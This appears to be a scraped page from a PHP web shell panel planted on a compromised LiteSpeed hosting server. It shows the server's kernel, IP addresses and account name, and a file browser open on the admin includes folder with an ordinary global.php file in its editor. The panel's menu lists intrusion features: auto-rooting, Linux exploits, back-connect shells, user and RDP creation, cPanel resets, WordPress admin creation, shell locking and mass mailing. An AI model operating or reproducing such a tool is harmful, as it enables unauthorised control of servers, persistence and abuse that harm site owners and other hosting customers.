Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.6.3.2 /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
auth.php
269
B
-rw-r--r--
global.php
1.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : global.php
<?php ob_start(); // just in case header("Expires: -1"); //ie busting header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0"); header("Pragma: no-cache"); header("X-Frame-Options: SAMEORIGIN"); header("Content-Security-Policy: frame-ancestors 'self'"); header("Referrer-Policy: same-origin"); header("X-Content-Type-Options: nosniff"); //set auto include path...get rid of all path headaches ini_set('include_path', $_SERVER['LS_SERVER_ROOT'] . 'admin/html/classes/:' . $_SERVER['LS_SERVER_ROOT'] . 'admin/html/classes/ws/:' . $_SERVER['LS_SERVER_ROOT'] . 'admin/html/includes/:.'); // **PREVENTING SESSION HIJACKING** // Prevents javascript XSS attacks aimed to steal the session ID ini_set('session.cookie_httponly', 1); // **PREVENTING SESSION FIXATION** // Session ID cannot be passed through URLs ini_set('session.use_only_cookies', 1); // Uses a secure connection (HTTPS) if possible if (isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] == 'on')) { ini_set('session.cookie_secure', 1); } date_default_timezone_set('America/New_York'); spl_autoload_register( function ($class) { include $class . '.php'; });
Close